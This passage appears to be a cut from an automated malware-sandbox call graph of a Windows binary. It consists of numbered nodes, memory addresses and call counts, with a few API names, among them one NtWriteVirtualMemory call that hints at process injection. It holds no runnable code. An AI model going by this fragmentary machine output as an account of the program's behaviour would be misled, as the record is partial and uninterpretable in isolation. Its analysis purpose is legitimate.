calls 3001->3003 3002->3001 3004 7ff74f58154e 3003->3004 3005 7ff74f581394 2 API calls 3004->3005 3006 7ff74f581558 3005->3006 3007 7ff74f58155d 3006->3007 3008 7ff74f581394 2 API calls 3006->3008 3009 7ff74f581394 2 API calls 3007->3009 3008->3007 3010 7ff74f581567 3009->3010 3011 7ff74f58156c 3010->3011 3012 7ff74f581394 2 API calls 3010->3012 3013 7ff74f581394 2 API calls 3011->3013 3012->3011 3014 7ff74f581576 3013->3014 3015 7ff74f58157b 3014->3015 3016 7ff74f581394 2 API calls 3014->3016 3017 7ff74f581394 2 API calls 3015->3017 3016->3015 3018 7ff74f581585 3017->3018 3019 7ff74f58158a 3018->3019 3020 7ff74f581394 2 API calls 3018->3020 3021 7ff74f581394 2 API calls 3019->3021 3020->3019 3022 7ff74f581599 3021->3022 3023 7ff74f581394 2 API calls 3022->3023 3024 7ff74f5815a3 3023->3024 3025 7ff74f581394 2 API calls 3024->3025 3026 7ff74f5815a8 3025->3026 3027 7ff74f581394 2 API calls 3026->3027 3028 7ff74f5815b7 3027->3028 3029 7ff74f581394 2 API calls 3028->3029 3030 7ff74f5815c6 3029->3030 3031 7ff74f581394 2 API calls 3030->3031 3032 7ff74f5815d5 3031->3032 3033 7ff74f581394 2 API calls 3032->3033 3034 7ff74f5815e4 3033->3034 3035 7ff74f581394 2 API calls 3034->3035 3036 7ff74f5815f3 3035->3036 3036->2776 3037 7ff74f58156c 3036->3037 3038 7ff74f581394 2 API calls 3037->3038 3039 7ff74f581576 3038->3039 3040 7ff74f58157b 3039->3040 3041 7ff74f581394 2 API calls 3039->3041 3042 7ff74f581394 2 API calls 3040->3042 3041->3040 3043 7ff74f581585 3042->3043 3044 7ff74f58158a 3043->3044 3045 7ff74f581394 2 API calls 3043->3045 3046 7ff74f581394 2 API calls 3044->3046 3045->3044 3047 7ff74f581599 3046->3047 3048 7ff74f581394 2 API calls 3047->3048 3049 7ff74f5815a3 3048->3049 3050 7ff74f581394 2 API calls 3049->3050 3051 7ff74f5815a8 3050->3051 3052 7ff74f581394 2 API calls 3051->3052 3053 7ff74f5815b7 3052->3053 3054 7ff74f581394 2 API calls 3053->3054 3055 7ff74f5815c6 3054->3055 3056 7ff74f581394 2 API calls 3055->3056 3057 7ff74f5815d5 3056->3057 3058 7ff74f581394 2 API calls 3057->3058 3059 7ff74f5815e4 3058->3059 3060 7ff74f581394 2 API calls 3059->3060 3061 7ff74f5815f3 3060->3061 3061->2776 3062 7ff74f58145e 3061->3062 3063 7ff74f581394 2 API calls 3062->3063 3064 7ff74f581468 3063->3064 3065 7ff74f58146d 3064->3065 3066 7ff74f581394 2 API calls 3064->3066 3067 7ff74f581394 2 API calls 3065->3067 3066->3065 3068 7ff74f581477 3067->3068 3069 7ff74f58147c 3068->3069 3070 7ff74f581394 2 API calls 3068->3070 3071 7ff74f581394 2 API calls 3069->3071 3070->3069 3072 7ff74f581486 3071->3072 3073 7ff74f58148b 3072->3073 3074 7ff74f581394 2 API calls 3072->3074 3075 7ff74f581394 2 API calls 3073->3075 3074->3073 3076 7ff74f581495 3075->3076 3077 7ff74f581394 2 API calls 3076->3077 3078 7ff74f58149a 3077->3078 3079 7ff74f581394 2 API calls 3078->3079 3080 7ff74f5814a9 3079->3080 3081 7ff74f581394 2 API calls 3080->3081 3082 7ff74f5814b8 3081->3082 3083 7ff74f581394 2 API calls 3082->3083 3084 7ff74f5814c7 3083->3084 3085 7ff74f581394 2 API calls 3084->3085 3086 7ff74f5814d6 3085->3086 3087 7ff74f581394 2 API calls 3086->3087 3088 7ff74f5814e5 3087->3088 3089 7ff74f581394 2 API calls 3088->3089 3090 7ff74f5814f4 3089->3090 3091 7ff74f581394 2 API calls 3090->3091 3092 7ff74f581503 3091->3092 3093 7ff74f581394 2 API calls 3092->3093 3094 7ff74f581512 3093->3094 3095 7ff74f581394 2 API calls 3094->3095 3096 7ff74f581521 3095->3096 3097 7ff74f581530 3096->3097 3098 7ff74f581394 2 API calls 3096->3098 3099 7ff74f581394 2 API calls 3097->3099 3098->3097 3100 7ff74f58153a 3099->3100 3101 7ff74f58153f 3100->3101 3102 7ff74f581394 2 API calls 3100->3102 3103 7ff74f581394 2 API calls 3101->3103 3102->3101 3104 7ff74f58154e 3103->3104 3105 7ff74f581394 2 API calls 3104->3105 3106 7ff74f581558 3105->3106 3107 7ff74f58155d 3106->3107 3108 7ff74f581394 2 API calls 3106->3108 3109 7ff74f581394 2 API calls 3107->3109 3108->3107 3110 7ff74f581567 3109->3110 3111 7ff74f58156c 3110->3111 3112 7ff74f581394 2 API calls 3110->3112 3113 7ff74f581394 2 API calls 3111->3113 3112->3111 3114 7ff74f581576 3113->3114 3115 7ff74f58157b 3114->3115 3116 7ff74f581394 2 API calls 3114->3116 3117 7ff74f581394 2 API calls 3115->3117 3116->3115 3118 7ff74f581585 3117->3118 3119 7ff74f58158a 3118->3119 3120 7ff74f581394 2 API calls 3118->3120 3121 7ff74f581394 2 API calls 3119->3121 3120->3119 3122 7ff74f581599 3121->3122 3123 7ff74f581394 2 API calls 3122->3123 3124 7ff74f5815a3 3123->3124 3125 7ff74f581394 2 API calls 3124->3125 3126 7ff74f5815a8 3125->3126 3127 7ff74f581394 2 API calls 3126->3127 3128 7ff74f5815b7 3127->3128 3129 7ff74f581394 2 API calls 3128->3129 3130 7ff74f5815c6 3129->3130 3131 7ff74f581394 2 API calls 3130->3131 3132 7ff74f5815d5 3131->3132 3133 7ff74f581394 2 API calls 3132->3133 3134 7ff74f5815e4 3133->3134 3135 7ff74f581394 2 API calls 3134->3135 3136 7ff74f5815f3 3135->3136 3136->2776 3693 7ff74f582660 3137->3693 3142 7ff74f58145e 2 API calls 3143 7ff74f582f35 3142->3143 3144 7ff74f582f53 3143->3144 3728 7ff74f581512 3143->3728 3146 7ff74f58145e 2 API calls 3144->3146 3148 7ff74f582f5d 3146->3148 3147 7ff74f582e3c 3695 7ff74f582690 3147->3695 3148->2927 3150 7ff74f581394 2 API calls 3149->3150 3151 7ff74f5814e5 3150->3151 3152 7ff74f581394 2 API calls 3151->3152 3153 7ff74f5814f4 3152->3153 3154 7ff74f581394 2 API calls 3153->3154 3155 7ff74f581503 3154->3155 3156 7ff74f581394 2 API calls 3155->3156 3157 7ff74f581512 3156->3157 3158 7ff74f581394 2 API calls 3157->3158 3159 7ff74f581521 3158->3159 3160 7ff74f581530 3159->3160 3161 7ff74f581394 2 API calls 3159->3161 3162 7ff74f581394 2 API calls 3160->3162 3161->3160 3163 7ff74f58153a 3162->3163 3164 7ff74f58153f 3163->3164 3165 7ff74f581394 2 API calls 3163->3165 3166 7ff74f581394 2 API calls 3164->3166 3165->3164 3167 7ff74f58154e 3166->3167 3168 7ff74f581394 2 API calls 3167->3168 3169 7ff74f581558 3168->3169 3170 7ff74f58155d 3169->3170 3171 7ff74f581394 2 API calls 3169->3171 3172 7ff74f581394 2 API calls 3170->3172 3171->3170 3173 7ff74f581567 3172->3173 3174 7ff74f58156c 3173->3174 3175 7ff74f581394 2 API calls 3173->3175 3176 7ff74f581394 2 API calls 3174->3176 3175->3174 3177 7ff74f581576 3176->3177 3178 7ff74f58157b 3177->3178 3179 7ff74f581394 2 API calls 3177->3179 3180 7ff74f581394 2 API calls 3178->3180 3179->3178 3181 7ff74f581585 3180->3181 3182 7ff74f58158a 3181->3182 3183 7ff74f581394 2 API calls 3181->3183 3184 7ff74f581394 2 API calls 3182->3184 3183->3182 3185 7ff74f581599 3184->3185 3186 7ff74f581394 2 API calls 3185->3186 3187 7ff74f5815a3 3186->3187 3188 7ff74f581394 2 API calls 3187->3188 3189 7ff74f5815a8 3188->3189 3190 7ff74f581394 2 API calls 3189->3190 3191 7ff74f5815b7 3190->3191 3192 7ff74f581394 2 API calls 3191->3192 3193 7ff74f5815c6 3192->3193 3194 7ff74f581394 2 API calls 3193->3194 3195 7ff74f5815d5 3194->3195 3196 7ff74f581394 2 API calls 3195->3196 3197 7ff74f5815e4 3196->3197 3198 7ff74f581394 2 API calls 3197->3198 3199 7ff74f5815f3 3198->3199 3199->2800 3201 7ff74f581394 2 API calls 3200->3201 3202 7ff74f581477 3201->3202 3203 7ff74f58147c 3202->3203 3204 7ff74f581394 2 API calls 3202->3204 3205 7ff74f581394 2 API calls 3203->3205 3204->3203 3206 7ff74f581486 3205->3206 3207 7ff74f58148b 3206->3207 3208 7ff74f581394 2 API calls 3206->3208 3209 7ff74f581394 2 API calls 3207->3209 3208->3207 3210 7ff74f581495 3209->3210 3211 7ff74f581394 2 API calls 3210->3211 3212 7ff74f58149a 3211->3212 3213 7ff74f581394 2 API calls 3212->3213 3214 7ff74f5814a9 3213->3214 3215 7ff74f581394 2 API calls 3214->3215 3216 7ff74f5814b8 3215->3216 3217 7ff74f581394 2 API calls 3216->3217 3218 7ff74f5814c7 3217->3218 3219 7ff74f581394 2 API calls 3218->3219 3220 7ff74f5814d6 3219->3220 3221 7ff74f581394 2 API calls 3220->3221 3222 7ff74f5814e5 3221->3222 3223 7ff74f581394 2 API calls 3222->3223 3224 7ff74f5814f4 3223->3224 3225 7ff74f581394 2 API calls 3224->3225 3226 7ff74f581503 3225->3226 3227 7ff74f581394 2 API calls 3226->3227 3228 7ff74f581512 3227->3228 3229 7ff74f581394 2 API calls 3228->3229 3230 7ff74f581521 3229->3230 3231 7ff74f581530 3230->3231 3232 7ff74f581394 2 API calls 3230->3232 3233 7ff74f581394 2 API calls 3231->3233 3232->3231 3234 7ff74f58153a 3233->3234 3235 7ff74f58153f 3234->3235 3236 7ff74f581394 2 API calls 3234->3236 3237 7ff74f581394 2 API calls 3235->3237 3236->3235 3238 7ff74f58154e 3237->3238 3239 7ff74f581394 2 API calls 3238->3239 3240 7ff74f581558 3239->3240 3241 7ff74f58155d 3240->3241 3242 7ff74f581394 2 API calls 3240->3242 3243 7ff74f581394 2 API calls 3241->3243 3242->3241 3244 7ff74f581567 3243->3244 3245 7ff74f58156c 3244->3245 3246 7ff74f581394 2 API calls 3244->3246 3247 7ff74f581394 2 API calls 3245->3247 3246->3245 3248 7ff74f581576 3247->3248 3249 7ff74f58157b 3248->3249 3250 7ff74f581394 2 API calls 3248->3250 3251 7ff74f581394 2 API calls 3249->3251 3250->3249 3252 7ff74f581585 3251->3252 3253 7ff74f58158a 3252->3253 3254 7ff74f581394 2 API calls 3252->3254 3255 7ff74f581394 2 API calls 3253->3255 3254->3253 3256 7ff74f581599 3255->3256 3257 7ff74f581394 2 API calls 3256->3257 3258 7ff74f5815a3 3257->3258 3259 7ff74f581394 2 API calls 3258->3259 3260 7ff74f5815a8 3259->3260 3261 7ff74f581394 2 API calls 3260->3261 3262 7ff74f5815b7 3261->3262 3263 7ff74f581394 2 API calls 3262->3263 3264 7ff74f5815c6 3263->3264 3265 7ff74f581394 2 API calls 3264->3265 3266 7ff74f5815d5 3265->3266 3267 7ff74f581394 2 API calls 3266->3267 3268 7ff74f5815e4 3267->3268 3269 7ff74f581394 2 API calls 3268->3269 3270 7ff74f5815f3 3269->3270 3270->2821 3271 7ff74f581404 3270->3271 3272 7ff74f581394 2 API calls 3271->3272 3273 7ff74f581413 3272->3273 3274 7ff74f581422 3273->3274 3275 7ff74f581394 2 API calls 3273->3275 3276 7ff74f581394 2 API calls 3274->3276 3275->3274 3277 7ff74f58142c 3276->3277 3278 7ff74f581431 3277->3278 3279 7ff74f581394 2 API calls 3277->3279 3280 7ff74f581394 2 API calls 3278->3280 3279->3278 3281 7ff74f58143b 3280->3281 3282 7ff74f581440 3281->3282 3283 7ff74f581394 2 API calls 3281->3283 3284 7ff74f581394 2 API calls 3282->3284 3283->3282 3285 7ff74f58144f 3284->3285 3286 7ff74f581394 2 API calls 3285->3286 3287 7ff74f581459 3286->3287 3288 7ff74f58145e 3287->3288 3289 7ff74f581394 2 API calls 3287->3289 3290 7ff74f581394 2 API calls 3288->3290 3289->3288 3291 7ff74f581468 3290->3291 3292 7ff74f58146d 3291->3292 3293 7ff74f581394 2 API calls 3291->3293 3294 7ff74f581394 2 API calls 3292->3294 3293->3292 3295 7ff74f581477 3294->3295 3296 7ff74f58147c 3295->3296 3297 7ff74f581394 2 API calls 3295->3297 3298 7ff74f581394 2 API calls 3296->3298 3297->3296 3299 7ff74f581486 3298->3299 3300 7ff74f58148b 3299->3300 3301 7ff74f581394 2 API calls 3299->3301 3302 7ff74f581394 2 API calls 3300->3302 3301->3300 3303 7ff74f581495 3302->3303 3304 7ff74f581394 2 API calls 3303->3304 3305 7ff74f58149a 3304->3305 3306 7ff74f581394 2 API calls 3305->3306 3307 7ff74f5814a9 3306->3307 3308 7ff74f581394 2 API calls 3307->3308 3309 7ff74f5814b8 3308->3309 3310 7ff74f581394 2 API calls 3309->3310 3311 7ff74f5814c7 3310->3311 3312 7ff74f581394 2 API calls 3311->3312 3313 7ff74f5814d6 3312->3313 3314 7ff74f581394 2 API calls 3313->3314 3315 7ff74f5814e5 3314->3315 3316 7ff74f581394 2 API calls 3315->3316 3317 7ff74f5814f4 3316->3317 3318 7ff74f581394 2 API calls 3317->3318 3319 7ff74f581503 3318->3319 3320 7ff74f581394 2 API calls 3319->3320 3321 7ff74f581512 3320->3321 3322 7ff74f581394 2 API calls 3321->3322 3323 7ff74f581521 3322->3323 3324 7ff74f581530 3323->3324 3325 7ff74f581394 2 API calls 3323->3325 3326 7ff74f581394 2 API calls 3324->3326 3325->3324 3327 7ff74f58153a 3326->3327 3328 7ff74f58153f 3327->3328 3329 7ff74f581394 2 API calls 3327->3329 3330 7ff74f581394 2 API calls 3328->3330 3329->3328 3331 7ff74f58154e 3330->3331 3332 7ff74f581394 2 API calls 3331->3332 3333 7ff74f581558 3332->3333 3334 7ff74f58155d 3333->3334 3335 7ff74f581394 2 API calls 3333->3335 3336 7ff74f581394 2 API calls 3334->3336 3335->3334 3337 7ff74f581567 3336->3337 3338 7ff74f58156c 3337->3338 3339 7ff74f581394 2 API calls 3337->3339 3340 7ff74f581394 2 API calls 3338->3340 3339->3338 3341 7ff74f581576 3340->3341 3342 7ff74f58157b 3341->3342 3343 7ff74f581394 2 API calls 3341->3343 3344 7ff74f581394 2 API calls 3342->3344 3343->3342 3345 7ff74f581585 3344->3345 3346 7ff74f58158a 3345->3346 3347 7ff74f581394 2 API calls 3345->3347 3348 7ff74f581394 2 API calls 3346->3348 3347->3346 3349 7ff74f581599 3348->3349 3350 7ff74f581394 2 API calls 3349->3350 3351 7ff74f5815a3 3350->3351 3352 7ff74f581394 2 API calls 3351->3352 3353 7ff74f5815a8 3352->3353 3354 7ff74f581394 2 API calls 3353->3354 3355 7ff74f5815b7 3354->3355 3356 7ff74f581394 2 API calls 3355->3356 3357 7ff74f5815c6 3356->3357 3358 7ff74f581394 2 API calls 3357->3358 3359 7ff74f5815d5 3358->3359 3360 7ff74f581394 2 API calls 3359->3360 3361 7ff74f5815e4 3360->3361 3362 7ff74f581394 2 API calls 3361->3362 3363 7ff74f5815f3 3362->3363 3363->2826 3365 7ff74f581394 2 API calls 3364->3365 3366 7ff74f581585 3365->3366 3367 7ff74f58158a 3366->3367 3368 7ff74f581394 2 API calls 3366->3368 3369 7ff74f581394 2 API calls 3367->3369 3368->3367 3370 7ff74f581599 3369->3370 3371 7ff74f581394 2 API calls 3370->3371 3372 7ff74f5815a3 3371->3372 3373 7ff74f581394 2 API calls 3372->3373 3374 7ff74f5815a8 3373->3374 3375 7ff74f581394 2 API calls 3374->3375 3376 7ff74f5815b7 3375->3376 3377 7ff74f581394 2 API calls 3376->3377 3378 7ff74f5815c6 3377->3378 3379 7ff74f581394 2 API calls 3378->3379 3380 7ff74f5815d5 3379->3380 3381 7ff74f581394 2 API calls 3380->3381 3382 7ff74f5815e4 3381->3382 3383 7ff74f581394 2 API calls 3382->3383 3384 7ff74f5815f3 3383->3384 3384->2828 3385 7ff74f58158a 3384->3385 3386 7ff74f581394 2 API calls 3385->3386 3387 7ff74f581599 3386->3387 3388 7ff74f581394 2 API calls 3387->3388 3389 7ff74f5815a3 3388->3389 3390 7ff74f581394 2 API calls 3389->3390 3391 7ff74f5815a8 3390->3391 3392 7ff74f581394 2 API calls 3391->3392 3393 7ff74f5815b7 3392->3393 3394 7ff74f581394 2 API calls 3393->3394 3395 7ff74f5815c6 3394->3395 3396 7ff74f581394 2 API calls 3395->3396 3397 7ff74f5815d5 3396->3397 3398 7ff74f581394 2 API calls 3397->3398 3399 7ff74f5815e4 3398->3399 3400 7ff74f581394 2 API calls 3399->3400 3401 7ff74f5815f3 3400->3401 3401->2828 3403 7ff74f581394 2 API calls 3402->3403 3404 7ff74f5815f3 3403->3404 3404->2838 3406 7ff74f581394 2 API calls 3405->3406 3407 7ff74f5815b7 3406->3407 3408 7ff74f581394 2 API calls 3407->3408 3409 7ff74f5815c6 3408->3409 3410 7ff74f581394 2 API calls 3409->3410 3411 7ff74f5815d5 3410->3411 3412 7ff74f581394 2 API calls 3411->3412 3413 7ff74f5815e4 3412->3413 3414 7ff74f581394 2 API calls 3413->3414 3415 7ff74f5815f3 3414->3415 3415->2856 3415->2857 3417 7ff74f581394 2 API calls 3416->3417 3418 7ff74f58153a 3417->3418 3419 7ff74f58153f 3418->3419 3420 7ff74f581394 2 API calls 3418->3420 3421 7ff74f581394 2 API calls 3419->3421 3420->3419 3422 7ff74f58154e 3421->3422 3423 7ff74f581394 2 API calls 3422->3423 3424 7ff74f581558 3423->3424 3425 7ff74f58155d 3424->3425 3426 7ff74f581394 2 API calls 3424->3426 3427 7ff74f581394 2 API calls 3425->3427 3426->3425 3428 7ff74f581567 3427->3428 3429 7ff74f58156c 3428->3429 3430 7ff74f581394 2 API calls 3428->3430 3431 7ff74f581394 2 API calls 3429->3431 3430->3429 3432 7ff74f581576 3431->3432 3433 7ff74f58157b 3432->3433 3434 7ff74f581394 2 API calls 3432->3434 3435 7ff74f581394 2 API calls 3433->3435 3434->3433 3436 7ff74f581585 3435->3436 3437 7ff74f58158a 3436->3437 3438 7ff74f581394 2 API calls 3436->3438 3439 7ff74f581394 2 API calls 3437->3439 3438->3437 3440 7ff74f581599 3439->3440 3441 7ff74f581394 2 API calls 3440->3441 3442 7ff74f5815a3 3441->3442 3443 7ff74f581394 2 API calls 3442->3443 3444 7ff74f5815a8 3443->3444 3445 7ff74f581394 2 API calls 3444->3445 3446 7ff74f5815b7 3445->3446 3447 7ff74f581394 2 API calls 3446->3447 3448 7ff74f5815c6 3447->3448 3449 7ff74f581394 2 API calls 3448->3449 3450 7ff74f5815d5 3449->3450 3451 7ff74f581394 2 API calls 3450->3451 3452 7ff74f5815e4 3451->3452 3453 7ff74f581394 2 API calls 3452->3453 3454 7ff74f5815f3 3453->3454 3454->2880 3454->2881 3456 7ff74f581394 2 API calls 3455->3456 3457 7ff74f5814b8 3456->3457 3458 7ff74f581394 2 API calls 3457->3458 3459 7ff74f5814c7 3458->3459 3460 7ff74f581394 2 API calls 3459->3460 3461 7ff74f5814d6 3460->3461 3462 7ff74f581394 2 API calls 3461->3462 3463 7ff74f5814e5 3462->3463 3464 7ff74f581394 2 API calls 3463->3464 3465 7ff74f5814f4 3464->3465 3466 7ff74f581394 2 API calls 3465->3466 3467 7ff74f581503 3466->3467 3468 7ff74f581394 2 API calls 3467->3468 3469 7ff74f581512 3468->3469 3470 7ff74f581394 2 API calls 3469->3470 3471 7ff74f581521 3470->3471 3472 7ff74f581530 3471->3472 3473 7ff74f581394 2 API calls 3471->3473 3474 7ff74f581394 2 API calls 3472->3474 3473->3472 3475 7ff74f58153a 3474->3475 3476 7ff74f58153f 3475->3476 3477 7ff74f581394 2 API calls 3475->3477 3478 7ff74f581394 2 API calls 3476->3478 3477->3476 3479 7ff74f58154e 3478->3479 3480 7ff74f581394 2 API calls 3479->3480 3481 7ff74f581558 3480->3481 3482 7ff74f58155d 3481->3482 3483 7ff74f581394 2 API calls 3481->3483 3484 7ff74f581394 2 API calls 3482->3484 3483->3482 3485 7ff74f581567 3484->3485 3486 7ff74f58156c 3485->3486 3487 7ff74f581394 2 API calls 3485->3487 3488 7ff74f581394 2 API calls 3486->3488 3487->3486 3489 7ff74f581576 3488->3489 3490 7ff74f58157b 3489->3490 3491 7ff74f581394 2 API calls 3489->3491 3492 7ff74f581394 2 API calls 3490->3492 3491->3490 3493 7ff74f581585 3492->3493 3494 7ff74f58158a 3493->3494 3495 7ff74f581394 2 API calls 3493->3495 3496 7ff74f581394 2 API calls 3494->3496 3495->3494 3497 7ff74f581599 3496->3497 3498 7ff74f581394 2 API calls 3497->3498 3499 7ff74f5815a3 3498->3499 3500 7ff74f581394 2 API calls 3499->3500 3501 7ff74f5815a8 3500->3501 3502 7ff74f581394 2 API calls 3501->3502 3503 7ff74f5815b7 3502->3503 3504 7ff74f581394 2 API calls 3503->3504 3505 7ff74f5815c6 3504->3505 3506 7ff74f581394 2 API calls 3505->3506 3507 7ff74f5815d5 3506->3507 3508 7ff74f581394 2 API calls 3507->3508 3509 7ff74f5815e4 3508->3509 3510 7ff74f581394 2 API calls 3509->3510 3511 7ff74f5815f3 3510->3511 3511->2890 3512 7ff74f581440 3511->3512 3513 7ff74f581394 2 API calls 3512->3513 3514 7ff74f58144f 3513->3514 3515 7ff74f581394 2 API calls 3514->3515 3516 7ff74f581459 3515->3516 3517 7ff74f58145e 3516->3517 3518 7ff74f581394 2 API calls 3516->3518 3519 7ff74f581394 2 API calls 3517->3519 3518->3517 3520 7ff74f581468 3519->3520 3521 7ff74f58146d 3520->3521 3522 7ff74f581394 2 API calls 3520->3522 3523 7ff74f581394 2 API calls 3521->3523 3522->3521 3524 7ff74f581477 3523->3524 3525 7ff74f58147c 3524->3525 3526 7ff74f581394 2 API calls 3524->3526 3527 7ff74f581394 2 API calls 3525->3527 3526->3525 3528 7ff74f581486 3527->3528 3529 7ff74f58148b 3528->3529 3530 7ff74f581394 2 API calls 3528->3530 3531 7ff74f581394 2 API calls 3529->3531 3530->3529 3532 7ff74f581495 3531->3532 3533 7ff74f581394 2 API calls 3532->3533 3534 7ff74f58149a 3533->3534 3535 7ff74f581394 2 API calls 3534->3535 3536 7ff74f5814a9 3535->3536 3537 7ff74f581394 2 API calls 3536->3537 3538 7ff74f5814b8 3537->3538 3539 7ff74f581394 2 API calls 3538->3539 3540 7ff74f5814c7 3539->3540 3541 7ff74f581394 2 API calls 3540->3541 3542 7ff74f5814d6 3541->3542 3543 7ff74f581394 2 API calls 3542->3543 3544 7ff74f5814e5 3543->3544 3545 7ff74f581394 2 API calls 3544->3545 3546 7ff74f5814f4 3545->3546 3547 7ff74f581394 2 API calls 3546->3547 3548 7ff74f581503 3547->3548 3549 7ff74f581394 2 API calls 3548->3549 3550 7ff74f581512 3549->3550 3551 7ff74f581394 2 API calls 3550->3551 3552 7ff74f581521 3551->3552 3553 7ff74f581530 3552->3553 3554 7ff74f581394 2 API calls 3552->3554 3555 7ff74f581394 2 API calls 3553->3555 3554->3553 3556 7ff74f58153a 3555->3556 3557 7ff74f58153f 3556->3557 3558 7ff74f581394 2 API calls 3556->3558 3559 7ff74f581394 2 API calls 3557->3559 3558->3557 3560 7ff74f58154e 3559->3560 3561 7ff74f581394 2 API calls 3560->3561 3562 7ff74f581558 3561->3562 3563 7ff74f58155d 3562->3563 3564 7ff74f581394 2 API calls 3562->3564 3565 7ff74f581394 2 API calls 3563->3565 3564->3563 3566 7ff74f581567 3565->3566 3567 7ff74f58156c 3566->3567 3568 7ff74f581394 2 API calls 3566->3568 3569 7ff74f581394 2 API calls 3567->3569 3568->3567 3570 7ff74f581576 3569->3570 3571 7ff74f58157b 3570->3571 3572 7ff74f581394 2 API calls 3570->3572 3573 7ff74f581394 2 API calls 3571->3573 3572->3571 3574 7ff74f581585 3573->3574 3575 7ff74f58158a 3574->3575 3576 7ff74f581394 2 API calls 3574->3576 3577 7ff74f581394 2 API calls 3575->3577 3576->3575 3578 7ff74f581599 3577->3578 3579 7ff74f581394 2 API calls 3578->3579 3580 7ff74f5815a3 3579->3580 3581 7ff74f581394 2 API calls 3580->3581 3582 7ff74f5815a8 3581->3582 3583 7ff74f581394 2 API calls 3582->3583 3584 7ff74f5815b7 3583->3584 3585 7ff74f581394 2 API calls 3584->3585 3586 7ff74f5815c6 3585->3586 3587 7ff74f581394 2 API calls 3586->3587 3588 7ff74f5815d5 3587->3588 3589 7ff74f581394 2 API calls 3588->3589 3590 7ff74f5815e4 3589->3590 3591 7ff74f581394 2 API calls 3590->3591 3592 7ff74f5815f3 3591->3592 3592->2890 3592->2901 3594 7ff74f5835c1 memset 3593->3594 3605 7ff74f5833c3 3593->3605 3595 7ff74f5835e6 3594->3595 3597 7ff74f58362b wcscpy wcscat wcslen 3595->3597 3596 7ff74f58343a memset 3596->3605 3598 7ff74f581422 2 API calls 3597->3598 3599 7ff74f583728 3598->3599 3601 7ff74f583767 3599->3601 3985 7ff74f581431 3599->3985 3600 7ff74f583493 wcscpy wcscat wcslen 3896 7ff74f581422 3600->3896 3609 7ff74f5814c7 3601->3609 3605->3594 3605->3596 3605->3600 3607 7ff74f58145e 2 API calls 3605->3607 3608 7ff74f583579 3605->3608 3606 7ff74f58145e 2 API calls 3606->3601 3607->3605 3608->3594 3610 7ff74f581394 2 API calls 3609->3610 3611 7ff74f5814d6 3610->3611 3612 7ff74f581394 2 API calls 3611->3612 3613 7ff74f5814e5 3612->3613 3614 7ff74f581394 2 API calls 3613->3614 3615 7ff74f5814f4 3614->3615 3616 7ff74f581394 2 API calls 3615->3616 3617 7ff74f581503 3616->3617 3618 7ff74f581394 2 API calls 3617->3618 3619 7ff74f581512 3618->3619 3620 7ff74f581394 2 API calls 3619->3620 3621 7ff74f581521 3620->3621 3622 7ff74f581530 3621->3622 3623 7ff74f581394 2 API calls 3621->3623 3624 7ff74f581394 2 API calls 3622->3624 3623->3622 3625 7ff74f58153a 3624->3625 3626 7ff74f58153f 3625->3626 3627 7ff74f581394 2 API calls 3625->3627 3628 7ff74f581394 2 API calls 3626->3628 3627->3626 3629 7ff74f58154e 3628->3629 3630 7ff74f581394 2 API calls 3629->3630 3631 7ff74f581558 3630->3631 3632 7ff74f58155d 3631->3632 3633 7ff74f581394 2 API calls 3631->3633 3634 7ff74f581394 2 API calls 3632->3634 3633->3632 3635 7ff74f581567 3634->3635 3636 7ff74f58156c 3635->3636 3637 7ff74f581394 2 API calls 3635->3637 3638 7ff74f581394 2 API calls 3636->3638 3637->3636 3639 7ff74f581576 3638->3639 3640 7ff74f58157b 3639->3640 3641 7ff74f581394 2 API calls 3639->3641 3642 7ff74f581394 2 API calls 3640->3642 3641->3640 3643 7ff74f581585 3642->3643 3644 7ff74f58158a 3643->3644 3645 7ff74f581394 2 API calls 3643->3645 3646 7ff74f581394 2 API calls 3644->3646 3645->3644 3647 7ff74f581599 3646->3647 3648 7ff74f581394 2 API calls 3647->3648 3649 7ff74f5815a3 3648->3649 3650 7ff74f581394 2 API calls 3649->3650 3651 7ff74f5815a8 3650->3651 3652 7ff74f581394 2 API calls 3651->3652 3653 7ff74f5815b7 3652->3653 3654 7ff74f581394 2 API calls 3653->3654 3655 7ff74f5815c6 3654->3655 3656 7ff74f581394 2 API calls 3655->3656 3657 7ff74f5815d5 3656->3657 3658 7ff74f581394 2 API calls 3657->3658 3659 7ff74f5815e4 3658->3659 3660 7ff74f581394 2 API calls 3659->3660 3661 7ff74f5815f3 3660->3661 3661->2916 3663 7ff74f582f88 3662->3663 3664 7ff74f5814a9 2 API calls 3663->3664 3665 7ff74f582fd0 3664->3665 3665->2891 3667 7ff74f582690 10 API calls 3666->3667 3668 7ff74f58391e 3667->3668 3669 7ff74f5814a9 2 API calls 3668->3669 3688 7ff74f583b21 3668->3688 3670 7ff74f583967 3669->3670 3671 7ff74f583b28 3670->3671 4070 7ff74f5814b8 3670->4070 4319 7ff74f5815c6 3671->4319 3674 7ff74f583a87 memset 4130 7ff74f58148b 3674->4130 3676 7ff74f5814b8 2 API calls 3678 7ff74f58398f 3676->3678 3678->3674 3678->3676 4125 7ff74f5815d5 3678->4125 3682 7ff74f5814b8 2 API calls 3683 7ff74f583b07 3682->3683 3683->3671 3684 7ff74f583b0b 3683->3684 4252 7ff74f58147c 3684->4252 3687 7ff74f58145e 2 API calls 3687->3688 3688->2902 3690 7ff74f5883f0 malloc 3689->3690 3691 7ff74f5813b8 3690->3691 3692 7ff74f5813c6 NtWriteVirtualMemory 3691->3692 3692->2959 3694 7ff74f58266f memset 3693->3694 3694->3147 3771 7ff74f58155d 3695->3771 3697 7ff74f5827f4 3698 7ff74f5814c7 2 API calls 3697->3698 3701 7ff74f582816 3698->3701 3700 7ff74f582785 wcsncmp 3800 7ff74f5814e5 3700->3800 3703 7ff74f581503 2 API calls 3701->3703 3704 7ff74f58283d 3703->3704 3706 7ff74f582847 memset 3704->3706 3705 7ff74f582d27 3708 7ff74f582877 3706->3708 3707 7ff74f5828bc wcscpy wcscat wcslen 3709 7ff74f5828ee wcslen 3707->3709 3710 7ff74f58291a 3707->3710 3708->3707 3709->3710 3711 7ff74f582967 wcslen 3710->3711 3713 7ff74f582985 3710->3713 3711->3713 3712 7ff74f5829d9 wcslen 3714 7ff74f5814a9 2 API calls 3712->3714 3713->3705 3713->3712 3715 7ff74f582a73 3714->3715 3716 7ff74f5814a9 2 API calls 3715->3716 3717 7ff74f582bd2 3716->3717 3849 7ff74f5814f4 3717->3849 3720 7ff74f5814c7 2 API calls 3721 7ff74f582c99 3720->3721 3722 7ff74f5814c7 2 API calls 3721->3722 3723 7ff74f582cb1 3722->3723 3724 7ff74f58145e 2 API calls 3723->3724 3725 7ff74f582cbb 3724->3725 3726 7ff74f58145e 2 API calls 3725->3726 3727 7ff74f582cc5 3726->3727 3727->3142 3729 7ff74f581394 2 API calls 